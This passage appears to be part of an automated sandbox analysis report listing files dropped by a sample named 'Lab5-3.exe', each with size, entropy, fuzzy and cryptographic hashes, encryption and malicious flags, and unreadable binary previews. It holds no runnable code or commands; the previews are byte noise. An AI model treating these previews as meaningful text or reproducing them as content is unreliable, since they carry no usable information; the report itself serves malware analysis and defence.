                                                                                                          Preview:h.x.ES*...$t).a..".=.?..}...`/..tD+.J..}.zd.;..``.".).....]..:5.X....<.......i.........8i-N........<......W...........X5.X.3....`.l1...-.5.%K...G....;...U......@.U.....F.W.cQ......x.+840>...q..../..<.........q..kd.Fk.z.;.....B...t..CG..;8Jd.......W.\.-...LSY....(..el....f1..&....3DPphK#/..|..0.....I2..Z...!.(.._H../..J#.9..+.?S...s.)..O..w......Zq.A...L.H...|Xa9f.KY..j...A.. ..n...O..u..y.#Q..PI.t.Q.+.5....5n.&........F...v.>.%..U..'....v.N......u.#b@.Q....K2.Bs.X:.M..2r...w..!./.TK..c-.....u.O..&.).........@c.H./..d.e.....g....~p`4...`...u5..e.....*...D..b1iP.q.j......u..rTxP.i....N*0L.\.7...z.)...s..eF...4.&.."..)+().F..`(j..hk'L....Xj..%.,9"..?..h....L..3.X8n.p.....bH.."-.Zn..&`R..n#K5[.... ....V<..q:....Db.........8.I(.5..]...%Gi.......7.~.....W.w,a....D_H...|.z.4...c>.IW7......E....c|.'d6#V..9\./.h..../^.6.rM.+x8S......h.df;...........T6i.ot.:Up.7W1E..O.m..=J.7 G.C.8....3i>...X7...O....:~.}..@.V.E.B@.o.\DG...".4.h.....1}..h....c._gg.q.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):151376
                                                                                                          Entropy (8bit):7.998619885646662
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:h7hQrJtXA1UylTmNurRTLpei8bRvMj7Zgn/pvCnAf0zGtac/p0xrwQZ:hkvOfTmaRTLpCvMjNG/paatac/p0xrwU
                                                                                                          MD5:20875800717961D5D61F379F47C3BF6E
                                                                                                          SHA1:153C71928C6DFD0ACC4A893BC2F720A7325BA0EA
                                                                                                          SHA-256:9416F914BDE26D9A46814321BDC96E3346F9324159073AABFDFE44453185821E
                                                                                                          SHA-512:0FE974D204A7C75803F6ED8C996E48A2241D8CF51C61343DFAC3DA5A48B20EC7BCBA69391E686EA911ABEF280010BD206715A4D60D6AED469D9F2353F4DA48D7
                                                                                                          Malicious:true
                                                                                                          Preview:K.u9..Z%....3.lx.....#.^..={! .?$.eN...(.l...'.![.........Ss.....'.R..o.....j7.+Q."G,6.Q...8./.C.,0........j.um..!.*..).,d.wz..Z."....=Pe..P.~ ..HU..........:C2.w.P..6.B.P.B..&...Y.........}I.J|..,.;...VU`...d)[A.Q.=.[W0.._.."..J..V*..c.(W.....N..3..NPN...<.....(L.A.D......v.........p...4.............c....sI./..}.-a.i...K"..J[UpQ.E.....C.7.$I.....[.....s&.0D.G?..^.k..".......}b.*..How..U.4.nsa...b.1$....{?4_.....>.O...r9....8.V..T.-..I.Ke.%*%.1."....1....q......*...<.Lv.d..J.Mn...l.S.>.......s..._7x..2t........9.6=`0.......V.38._;.(.Y\<...5.}...:_.4..nu>..[.k7Rxy.S.....0cM.z..Sm......}..gVJ1M.A........;........\z....../9...\Q.Z..H:..1=:V.C8.UWw...b.b.6....,......x .o...A,.{.".b.._.y.L..b;9..7.]...K.T.... s.h.....B.X.\......6.....v..p...H..K)^pY.'.....9.....J_)Z>..Vx..d..lB....I.c..i.(Vq';...w......S...#A.......K..}..P....l...W.d5s.A....i.i...,........j.+...[.HA.L(..%[uqv!uY._...3.l..Q..~....Z)........lY51....j...T...R.B......Kr..m.../\..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8548880
                                                                                                          Entropy (8bit):5.245155313507912
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:DhuOBrLOPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOf:D9RSF1qd/LKNf
                                                                                                          MD5:2ED5D145138817E911CB46FC69DCD837
                                                                                                          SHA1:46560514411332C10BF547A1D6A7EFD686C5F755
                                                                                                          SHA-256:5FE8D519A508DBC9D5DA4D8C82B73E2B6AA18C83ABF9DEE1588A12531106761D
                                                                                                          SHA-512:88CD777094E7480B54A968097FDF233DEC682F46BD7BF0D362E7F226938A5CA0562510471470F0CC2A1F3FD505ED03DDF6E122F249AA4A1C4B5F047257E895D1
                                                                                                          Malicious:false
                                                                                                          Preview:.....p.m~.........L.j.A..6..D..=.R')+........-./(^....Q.&.F.G.y..)b..d.dz.....>.....Z.|...jJ[.|...F......d>4...C.[..D2.t......".9......\.;.YO..#.R....i....wL .3..r._..re.).9q$q........HJB"EA.[...^.{.Iuc.bP.....e..WE.J%6w....0...\..../F.nc.+.b=3.....r..).y...+..C.Q.s......K.>w.X65...os....B..#z+`p..Gh. %.X#...Y.\...T..7.v;.."xJ.J+.36.@........8M_`.`..O..*~tbj.3.JzIu..[..0.....F.C.Gsf>...C....YA.2.%`RkJ..to.h7..u.-\..Cc........w..../.z8.,c.cu.......b..d..@.U..%...Z.c<v.......n<Z..c..n.z.....7.L.(GE....T..F-}.....(Kf2=2.$...2.h.)....`....G....R.e.p...,.$...`6.}r..wmag.t...|..k.A.rEV../V..o..*.;eT.d.Wr............_..{.?............H_=..4V.wf..o..h.|...[t=......$..))..v.R...F}@...B..r.G.......e.Q..s....+Ohl5..:.S...e..%....#O.N.+..r....y3._..M..|./..TjiM_.I...8>X.`..D..&..!0.}.4.H .9z....!*....../......j..<.KYEwy$..`.....5..3&.UH..?..<E...~Iy..D7..O[c.|..z...._...,ACV.....^.?Bi.M....6<}.~s.C.9.gNk..ZC.=/|..(..-.P.h.G..<....2.i.8.E...j.v....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8548880
                                                                                                          Entropy (8bit):5.245022284576562
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:GVLvOPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOK:UaF1qd/LKNK
                                                                                                          MD5:6CF7F26F27D190DC946B127712A24C80
                                                                                                          SHA1:194820914F1295E12575628AD1A12DB59FCEBCEB
                                                                                                          SHA-256:18FE98200B7B1ABE712C0CACCDDFD7ABBC26D2E0EF0E3401BB5C0679E4D7C97F
                                                                                                          SHA-512:41376C627E0A9EFA92E2D51071C89F0984D999A1ADC8D607800CAB2674B744D0F84F4581A88FC48506EF90398ADD2A8E5699133661C305820DD2CA62B51CDD8E
                                                                                                          Malicious:false
                                                                                                          Preview:.......0.G.IU.vl^...k.....4!-.t.T.1...o..._)2........O....z;.....F.........6......?iRx..Z....13.`H.4..Aif..i..J*T..l..im7.]....~.Q..$b.....}....I..Q..-K./.*.[.......F.=XsJ..+W$..C...'.,...~2*+L..d..w.3#*+.p1........T.z.wus.....s#.#u...../k.. .N./B1.....F.U...............":.7}..c..5....7..[...r.......Q s..Q..Mm..#......B..!Q5+]zw....._..g..........TY..u..[.....f....y.D0...@." ..`.(_........m..o....\.N...VQ).-_..a8.+...s.'..`V.1WS../.G.....W.0.C.....BD*V2.dM/...Ob.M...d.8.>Sa..<...j..I=.6E_>...\eo..5p...u[.Y..e...F..!....!...X._..^i..A..o.Q..q.2..}.k.H.G....>...DY'..dT..Z.c....{g..........i....JnUQ.S5[.W...[.xe......OR.x.^..P.....GH..0.M.qVp#.Mf.n....RS.L..u....q.M.g....YL.........f@5. fa^T........W....0.Y.... .o+.+...*.n...(<*.M-?P.@...6.ZR..#&.A.0.l._.i..huL.... -..'..'.b.(.xa...tI\..8.q?.~zu....n......K..".-...G ...\w..#........EM.5.#.l....nQ....\<5R.......+..{.....W..,.......w.....u..T2f.$b.0d......`... ..Tv..x....&....k..L.u.2.w.e.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1193488
                                                                                                          Entropy (8bit):6.0863918953819365
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:AgOwqWsglkL6t2c7OFaxDSh7KVmaS4aMz8Pg3lxJo2cvXtk:ALwqWwLjkx8KVzaYcAqtk
                                                                                                          MD5:31994F34E40591D6BE08803504AF6D31
                                                                                                          SHA1:ADFF9568C0F53A9A033FD0BBAE5C6BECDE3FDC99
                                                                                                          SHA-256:E2B8CF5FB12E7DC9940FDE9E7D28BF3E169777FC3BE309FAE818B53750F2A255
                                                                                                          SHA-512:17A409487D916DA3E57595E6C59F0840090355468DBAB2E7346EFBBA6CEC415B9F6947D8B9522BE39C217CB9B92CE23529EDB313977D2974CFAC69BD6BBF554A
                                                                                                          Malicious:false
                                                                                                          Preview:..5.y.'.cxI..%.w.k.i......_Z.:.-.0H..&\....RA..F.a...H...X..vJM..d.j.|~..[K..Zg\.o..ixS.Z.2..Y....G.lw......2?.....<".u4..d.z.BL.C..!..M.mBGr......4.8.D?...Z..~.Y....H.W.ga\...O.T...&O...'.....n..+dB..`.12..,~...-....h..a....M7g.f..A.}3M....;....Y.:K.=...N.$.&.D.aDhnrl.&....S-/.z.~|.m[j.t.0iI..[.1}....i......b.......<..R..~[..}f..!...zf,x...1..y......*..zR?........lo"g...G......\.$9n..@.aC....x$..)...%9..T.>...&#..+:.8r...N.....x.B(C...f)~...v.E...w..Y..!I..0K...1]..{?!.zv.......eC...!...G..L.<m..8.s.....XrA..9...i..C0'...R.,#vr.C.xfP+.I........HO... ..#...-p...Q./2.t.p)p...Hu}..!..)....S..E.{...=..V..9....^.>?_.........V..X..........I...t..z.mJ.8n3?..$..HddRo...>...-..+....].C}Z..y.>....J..0...q.XL._iK.8..(.n...w.u..^.\h.l.`y,'..B........N.1!........+k9p.u,X_..2...9N5....>.H..u........'.....1..(./..b<..o.D.d......#o.}._.j."IP........>5.rc.}xo.=...1.R/.n.9..O.?D.....n./.<+..V.......bz8.d...1.._)l.|.P.....8+...s'..c.......B.8u8.d...1..).s9H.&~Z.q
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1193488
                                                                                                          Entropy (8bit):6.0862577800962585
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:ENcZs0RajIZoy2c427xp3Q0C0m3GWPEKVmaS4aMz8Pg3lxJo2cvXtZ1:EAsPjAoK7H3E0oGW8KVzaYcAqtz
                                                                                                          MD5:025A1ADD0150E4FA708250B20E11FE85
                                                                                                          SHA1:FDD1FE501C75E001DF45EAB06359E31FFD4A2ABA
                                                                                                          SHA-256:8D5940BA89A27AEC985B6A689291D11C8D645203EFF8B7FB869C80B032E6492C
                                                                                                          SHA-512:F957BF95552E0262EC35545684191328559B8E3139A1916C77D594D307B4525322E388F3EF2BFF2A574C1B6DB721FA374C2D91BB7CEF166EF95DD80BBB8A4937
                                                                                                          Malicious:false
                                                                                                          Preview:..Z?.Ni`?W.....B.(..:T..r..m".&.v...r:....P........*-..-._.s.K+.._>.....Bc....r...J.j..c0.....;.u....YZ..i%.C!.#(...m....+..;nlWT..&T..."._..7e.....^..G...s..........8.ik.j>KUgvU.rU..}.Tg..x%...@..z..^........3.RYGv8P..*D....i+.T...X....g.W.X.P0...|.....<.IO....lG..T.._._..=a.!.40S`...o.@._....4L{1....{5_k...SPU...a..G@.Ns."]qa.~QN...F$."7&.....Rg...b...k..{.M.E.v3......?S... ulU....y[n...J.....<G..p...s..B........p.6xJ.....T..."..Mh/7=.$.%....@G.G...C..C.P.B.....5hoh..q.4.r<...(..i...W..o....Ri.C.=....*.....).....M^?...~O.mW....N.!;...B*q.6+.....F^....y.`.t.....^.-)\M...%}....&.08.Gv.9...8...O.8V.N<Fx....X-..k..'..&...K^.@w.R..Mo.r.1.|,..B.`..Y...TM....2.../d!H....B.n.P9....mi.P-.k..'m...N\>.b..l<X....p...............;....=6THT..%11...,.mr.Z.|.+...9.R\...C.}:F.)).w..^.d.J.....v.ap...u..`=f.(..+E..."..s[...Y..._.f"n.rO.[.E.n..(.u.U...} ..L/*..]qsPw...E.&@Y...p.?s`.Q.K;.Z...^.....].0d......:.=..j........-..FVk.Z.}N`.4.p./..{T..^.#........9,/..W../P
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18064
                                                                                                          Entropy (8bit):7.990220551992759
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:9hGJ4lOtD3ybeiW7SNKdQHEglB+lOLfb706tb:/IBtdpuNtEg6lOLxZ
                                                                                                          MD5:7748AC0D1964A0198E3B761B3C051B7E
                                                                                                          SHA1:3D963F5474FA1FD490EB7959B0D95F0CE207FE0E
                                                                                                          SHA-256:792E1C7E09F623CE829F43924E3A2E8918B514E723C56E604E068C4A508BFD99
                                                                                                          SHA-512:B8172CE2E3AA69352E684AC1109096F7BB279089767BE8AA5D07A9CF32560F9B986544DCFB6D2527E10B2AC4D09B8DC239DBD01F0365A3A12D4B8F4603485642
                                                                                                          Malicious:true
                                                                                                          Preview:+.....w.0.O.s.....c...}.&D#./%..*.OU).B{.....u.~.....R."....Q.8~..y(....f......$....J3EgN.5......Q.Kp..9.k.b.S.|../&Au...I......Z4...mY.9..b....%$...[...v.U7^4MN..VB*H.....;.I+_0..,....;`S.....@..v..D.U.A!......!?fPZ.dLvh...em..c..V\..3^.....h.r...r..D...*.3!H...2#ek....6..O.D.3.....l.........0...(...;....A...V...'...U.....\.o.....dV.mT.[g,...#...C........n..|.h.7{.../K...+.....a..mp....up.S...1z!...T` .).%......bH.....dd...`?.M... ..=x.n..1m....&.%M..E..l.>..e.....".q.%.s.q.=n...p...d|!A....eU.......d...(.s=....#..oK&.u`h.l...p0..R2...JP ...d.. .F.v &.O..Np.f.J.Tc"r..>.F.L..)..i jG.?.gz."........~g.>G...v.................E..T.......B... .1.B.}.p..@..... ..j)....B.:U..@n..6.....Q...}8.p..........z..(......;".P.P..a.....JEp.z..mt..[.^..~..G.L..8.Y ....K....f:.I..q..c...k......r..zY@.4y...G<DH m=.(r...H...}.7_b'".R..6..&#..e....2v..V..;....$j....O..]>..b'......./..3*.X..!./)s1+>...!.`....g......Cdq...0 .>,.kK..anJt.CW'/...C..;.....F...C5
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18064
                                                                                                          Entropy (8bit):7.988286227709285
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:EzFq8JAbquVU+RrmWfP7XrJHnik/BOTXDX9pxX4tFAwttb:EzFq8N6U+RrvrZ/BOTTt7InBZ
                                                                                                          MD5:46AE13C30DC221C5C9ABBC9BB17AEFD6
                                                                                                          SHA1:EF496DBD08A805A790BE42081736A49FCA3B5636
                                                                                                          SHA-256:3AA9E8B130EF9D74EDF86BA10B4656F02F7A90A3BB582AC9F1C6387AD4891AA1
                                                                                                          SHA-512:F913D35EB00E6849C48F4B764BAF6C90CAA711F0F0ABFD3D493DCEFB91945DBF2526428D45753C30FDC5AD2E1F5E5DB10F9884C1C47E30A3F66E707869C98F60
                                                                                                          Malicious:false
                                                                                                          Preview:B.m.I6-.7..u.g.e....j.......w.d..e1...*g._4.......1=...Y......w...g7...ZB.......O..x..<.\$..j\+.d*m;.%...E.....;..9...D. ....e\.....`QgkV.R.(B.....&.....`.......G.E.S...$5B.J?.$X..{....!......+..z%1&..^J..'.~.....a+.r?...c...s.e[........=Rm...a.6.oJXgl4..gh..L..ru..b..U.N.8..l.[.^ rgF...b...,..SJ.eU.p.9..6k.^.BBG.f.,..........6...+,C..r\..1......o.U.8....\.w.3:..[~A..._..m.H.,..e?*.....E....H.....e.{_.......+`.S.U.o.t..........pZ.0I.a'...*..8.e.Tjw.7......2.P.y.2..n...C.....n......g..+...6.-....\....Q|Bj.....Rnm.n.......0S....Z.j.Ks..p........>.:..M.pL...../.._8.....0.1l!..."`%OF..E ..o....S...L..+.>2.8.A.?.8]K....={.^.6dZ#..(.[\.n..S...f..r...3.-lY......>...H...nnq...v....%..h.._\...@..v......[B.S[..3..L.Y..)..R..,~t.........S...a...wg.H...{P.........Y|..^..eFpCYu......,..f.K/.....D....j.NA2.....Xt..I......B....5.H..I.a.#2Z..Y..O.R....!,sc.!.N..]..9.N.3.s.N..c...\.....u5+....S..FtQ.8N^.f@".s..4.Q[......N...A....bS..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18160
                                                                                                          Entropy (8bit):7.990211390053301
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:w+Yd723Pfi+2QxPuGiIzhSkIdsN3DUdtb:FUy3Hi+2QwbX43DUdZ
                                                                                                          MD5:F446CEEF60FD301E30E57F3EDE935C32
                                                                                                          SHA1:4ADCF7CC2FF3C3877244968B45F23D63914889B2
                                                                                                          SHA-256:29754C091F499288F164C41C3E4D8594FC82F187D87BD7488B19A029DA2940D7
                                                                                                          SHA-512:565E0A04204DE266D4F1DD651C939AFE455F3E70A9550BB5438FDEED2145AD4D111A116038EAE9787FFB87E9869D32D2FA80AE369543083DCC2271F54523F76A
                                                                                                          Malicious:true
                                                                                                          Preview:.O.oQ.8..(.....m....JBF.......`...E..Is=..{~.&C..9A..*...p..M.C.b...z.{...p."4........}.\.....r..D..'. .k~:.Ql+_...q...4.......@.~.x.q...}.`<..9.........-......8.......q..,.P....7G8.A2.].!.%*a.@,..W.Cs...........}.,.e.........^.n...'...@i....B.T"RP....(..g..j.F0.ri....I......F.F..qF._e.0.`..V..s._.p..?<..l..,mVK.g.\Zd.. SX.4Q...5.%...*.......C.W.>...)..R.+.4.?x..[Y.B...?3..P........`y2..m.<E....=.X.O...9..fU.Q"]@..l..4..O;.]..[..).i....`.o.+k.........8.....!XF.]...$.k...3....\.c......F.$h..........XBI....O.0.d..b....@..-..../.m...e..G....a..#z$...o..&.d...d9....J...an..z*.........MOT.Us...bQ.+.e;T......~.~....f>......'.....{P..F..~`..q..+...e...g...B..O.E....*...>v.....[...v.2(....+a..\.7q..'._..0T.u..._.HB.d-?A.Z..&...I.V$"g.af..._......Kl...D.d.....p.!.}c7...U`.<.W....7ON...{4Q..L.=<G6.M.....hl&.....G..2.w9{&..d..rT...w=M..t.B3.s...,.?..dX.q.[...^.....O.^.b...9=.Y.>...hl..>|.4.>..sFBR....Q.#R^S.'..*I.v?.5....[k..n.p..`.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):25440
                                                                                                          Entropy (8bit):7.993011043692686
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:+s38li1gATXnMTn0zln9VyrEyQ4zRnCNdLZ:FCi1HLaUl9VszkNdLZ
                                                                                                          MD5:19247D2E613B38106966DE0EADA8DD04
                                                                                                          SHA1:336C20FC1694A534E8F64975718716F4E08F4C28
                                                                                                          SHA-256:E15D7AF716D8A27F7EBDD29A12AD5CCDEE990769EC170FD0AE64AD91A1AEE64C
                                                                                                          SHA-512:BCC149A9CDC33A489611447BB61FD11CA7E205F986A9F0DA9DDBD061FFE5AFEC856E5E0A0178F46B98990BB64A3ADF517B36CD95A085F2DAC92DB42DD17379AA
                                                                                                          Malicious:true
                                                                                                          Preview:./L.A<6/.....>."M{.MMd..%lht3.#.Z.<.m......o.Ng>.*...2.s..U...e+&...Y..4..2".....H....O.q..Y\Z[..{...W.>..../...+.c.-..<..p..r,$(.2.C-......1~.S.:..ie..3(..w...'.}.]/..C.)E..3*"6.,.f.1.Wh....../0.yQYY.'D....7Xq...A.=.6*...L.hU%t..Z.H.....@.O"2..\P.R...X.....m.<'....`.....&|=..V...).V.f..Z.O.@.Q.....S.F?......(..."..ca.V..cu.-m .... +J0.-|..u.1..q.I.R&1XA.Z..9f.......fl..t..0.oX.'|...RO.z`.P63..s...z0f..q..i7M.|..y.R.QM..)|.J..R3.y..F/..L.,/x....;.....0.........(d.;G{...J....&..LF*.}....I..o...?.9uJ..#...*..5..X..V..6...B.'.....Z.&.: .r.............K,..P..$.^p4Q..Dw1.cp..eY..6s..<.0"4...".....k.>/x.,..R._y...).Q..6!....A.l.............<..#..-.n:Wq....i.....C.E....~b'.F..(.G.o7.....2...e......z.....Li.9`9{~..._2..).(.\w....G@.j.5....i.;#.K....|&.6)........).p,k..xIwC.W..ob5..);.+..a@.0s).m.7P.$.h..Q.}.x..b..'......i.7M...q...S(d..P........m......+.!.\p"_. ...a{>S...9..N.B....6...LY..d.K&bo5.*&{p..+s+SJ.l.....gEX..j..........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2032
                                                                                                          Entropy (8bit):7.915430629214882
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:UDza0IPt5rhdgLNUPHfUTid3hBaUoSGFcmeykEdEElU92i:czXMt5tdgZGx0uKeY2ElUJ
                                                                                                          MD5:6600A9C5D181F4060CAAA3BD05EDCAEC
                                                                                                          SHA1:432FC609A41943C9544F4AFA0679CF8944BE7E0C
                                                                                                          SHA-256:7C9082B8C6CD42473082D136EEC9D326D946A4375F6853AA3000320E53FA1B14
                                                                                                          SHA-512:EAE6FA881B27BD762DDF590532C14ED73B97263CB360A53975A7D8C3E4E253BE4BAC5248B05FD33D91AC880CFD1F5FDAE2706A94365E9E634B88AC960602AFBE
                                                                                                          Malicious:false
                                                                                                          Preview:..)gC..u.....p...p..2xn.NS~+.x%c.f.F'..=..>.|.l?......N.4..;....L..$.5-.].1...8oh.}.]D.D..C.....4.p....w..g........+...U~d....b/.mfe.R.....A........XU;G......,f=...8.9(..it.\z\.....~}..._.....R.......`.W/q.p....';..?ua.3.....g..e#...........'...Qj.~Kq1.^n?./. .b=...3.G...Q.....R.E.CMr...p....%...Q...5yQY........]..1.....W...6.B...4.e.'... 5...r"..3`..J'>T.%.@~..i.9.i^O#~....+9.f..7..x....3O,...Y.&...5y(.wo...gr.].`J./,.?A..g..M.uc&..`..5d.i`.j.Uu...i. E...z.... 6....O..5....~...............'.M2sd..M&.....[..Q3..........XF..fl..'.~&...sG..$B......4.0U2T...Xafs..]..q...X.G.sO\h%.......2n.:.....`..1..e;~...>...f.Q1.%B...m.Z~Y...K......1...3 S-.B..s_..0.Z.D.f.,...#i..r.R.O.y.j..|.._./<. ...&n....r|f..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7488
                                                                                                          Entropy (8bit):7.975889720899335
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:YXYMNn341N/zjMt+imBxiu6clOJoNI2MYLBLLwPF4uhgRZkmJdMPqe9Gx0uKeY2b:MZ341JsjwxiuxO+UYLWPFDhFmJdGU0Cb
                                                                                                          MD5:647209D8F716AFEC7319988B5D81CDE2
                                                                                                          SHA1:4FDAF33D48D909BD5183421B7EE22D6CBAFCB56B
                                                                                                          SHA-256:6C440C43F64F973681C8810697FB6B6637E7488B211D2EF1D1EC705A09588B31
                                                                                                          SHA-512:1CC9D166E49CEE678269A21B236562DFFE129F8E3CEE07048E371ED5DC79590A63C96466B3880F5ADCE30DBB31CA9709B00BEEB06C51B7D82C85A02C11950294
                                                                                                          Malicious:false
                                                                                                          Preview:n.?(v4.&.$1..>.l.68.7..M$..3.F...U.%.rC......j.aw...$]9Z...gn...o~..VP7......'vt.z..8B.._c.......5....]..+E..I.. ;t.-8m.GW..6*........u.....@j.........5.......#.C.M.xJ.Q..u..e....N.PMi...[.l."........S...w..+.t.P.._../..H[.T..b.;....M.T.*.D.QS^........j...........hEz.r;..c..BO.sY._.P3......\..5.m.....i|*.............y......2.fu[..k......X..EhF..{a...r.&3......._..K.....s...l....m...v......hL..F.....Z4O2W...qp..F(j..*...9t..v..B.""`.C....n.c..Uf...V..{. ..3.Slo..vwZ...\d..4..rd+..`.*....KF.i.<...........c...7...VS....... ......i.}.r............T..*[...~ry.....b._..7.1...AN2.[....hx.}5.....wpq= .xp[..).W......[..t.?3.4...1q.Lt[/.<&....f.e../H....rF.2.E.e.....6....i.[.....L..o..!........r...........]...d../..z...N..e.rbYl#.p.S&H....%4..x,..'.L#.......5.]4.!...hEl.ftPX.+.kp...q.*$x2P...rs..`.......m!........1V4."F.. d...(..I6.g..1..%!@.yN.......Q.#..mSp...\.-..@.j.8P...<C..u..(.*Y..&D..D.9D.p.z[d.4.g;O.i4..s./...&o..w.^|(Y!c.M.. ...83.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):603720
                                                                                                          Entropy (8bit):4.674541381723741
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:Sh3s+fuPJifzl3+eMgEB8pQEgd93MY62De15J08A+QbwG38+9LJZ:C3s+2BIlueM5B8pQED2a1g+QbwOJ
                                                                                                          MD5:8B3E9346A5D73461EE385CAD42DF4E2F
                                                                                                          SHA1:E1F120AE7E197BD9B7CE7CF0706AEAB5E1291EA3
                                                                                                          SHA-256:4352813AE9311B21282AED8A051FBC4D4E710672EFDEBFB222BE0FF9ABAB26C7
                                                                                                          SHA-512:F722D9BD10AB89C5480313E02803EA211BEF889F99EB4962CCF2F40DF2618EFDE42E70EF64C6670486A0236BF60E5326ABA63BC69A35BE68775CDBB13E52D6BB
                                                                                                          Malicious:false
                                                                                                          Preview:.`wk...[.dW.d.....Z..9....au..r..[.......0..be....._t.j4!.;.5,..BdT..x.e3...U......H..$6.6.....RV..k..&.1.)w...b..(..'.......Khp.......;..;.-..g.....)3..G..[.H.vB.VI%.U+gG.3.........._...p...?..W.^......U.p4..ae..3...E.2.25T>.0..]?A.{&.d......~'S^R.S...z.<|....x.+.|nU.lY.....*#.....n.j.aX6..0Q....u...`...j.......v.y..%..X,..8.H.....h.&.Sa_c..P0&rU.)Q.I.i?..N.k...1..().I.G...|....:w0....{1o.r....2.....$.v.f..8.s.P+.<.N.9.C.y....t...Z.M.......F........97..n....Na....s..v...3.v...e... .......>E.r.....V.u.,C.{}E.>3..`...@.........x..{...A..h@..9....>D.E....L.++...5je..b:.1W...=T......Z...fln......<f\X.u.Nv/..z.r.........\..=.2...H....ET!#...i.'|.V{.9...X4JB(e/d..p9.P......)....}....+........2...b.....:bP..N.6.m{]...:.t0w.m..~$0...w....ND'.I.U.e.W.....?.{.8..X>:.!...........0......c.o.d..(..<....^..1Ua.i.`......XP.....".;....:"i*O}.Yp`..,H o...*.w.Y.b.fIF?...:.z..%.W...........z.g.p..<..y....aa....:.C..R.....3Q..2{..).Uu.C.R...?W...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):603720
                                                                                                          Entropy (8bit):4.6733931885097295
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:d9o/OXwY6euFQ0K/2f6jC0x1nziPsZ6xRwaHfggZk38znh5dZ:YOXwjWDOfo1zMxRjK4h5X
                                                                                                          MD5:483A13FDADB9B3CB9C9679722BC19D73
                                                                                                          SHA1:59105D184499B834A1E6EE4969BF5EF859F8EC40
                                                                                                          SHA-256:3269651FED43B699994A945CBF5DE42F7E6ECFE6E7384FE9FA43153A8AF30136
                                                                                                          SHA-512:5CF50219B10D7D8B3CD9B1A90F31A89B1E6FF1E07C34B190A73ECF1B5AB4813F1D689F0B847C41D0F56194BC0A7042F82016C188C0A564AF4B46D8B1E4B3EC2C
                                                                                                          Malicious:false
                                                                                                          Preview:..Z...G..n.@..9......+%}"um.....-....#...........j~H..:...y.c./.....i..x.........'...9.Kk..9....)..I...v/k.~......0*...........ma...){..q+.4.3....;W.]...37(]l|..duj.LT.|...%._K;.2..gj.q.(.?...n...|.1.?Q......."C,..f..?...>Z+.}OYm...7..G...].........#...H.....z.y...&. .. Ng|'..K;....w..D....+.J.6.....U..]B..kx.l.l........m..-..-.:B.........Iz..".Y...G...Q...i...k...9.!.z.Q&.....*..w.......).).)-6.fI.5.(f..x.us.(.n........GpCr...#........!1h.O..x\:@.4..Z.w.|..\.,.P.)G...MK3.9.\...&tc.t....WtM.=A...~...;wg'N.....I.7y/.......k..._o...$.a.._..X./_...f..;....V..w.*.@..|@T.....vA1q.,.vm/...TG.H....e..h."..x.".',{......9.b.G....@Y.Xx..u..U.3..V*.ai.....V<Poq^...\q..(....'b...p.`....t'.;..-bP.R\..v.YIe.B....(x.*z...........cNh..E..f.1&w|M......,.......e....6..x&..^...7.Tm[.O.s.I....:..x..I........d.....7b|..E...l5.f.h...4w..hF...8..r.*.C....J.!".7l....6..E... *>T.Fq!.....%W./.....\..a....a.<.@..c........9=....W.yTfb..9.u..\j.H..pK...6P...v.Q..L...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5632
                                                                                                          Entropy (8bit):7.967821297647246
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:jy2YQrCC6FtYO8KKrd5iBmy/7k6/q0eTuiqfzAVvRm+GGx0uKeY2ElUJ:oWC7tF8jdKDk6ouRcV/0Cb
                                                                                                          MD5:42C9A2E2384212699058C3E9A362FEC7
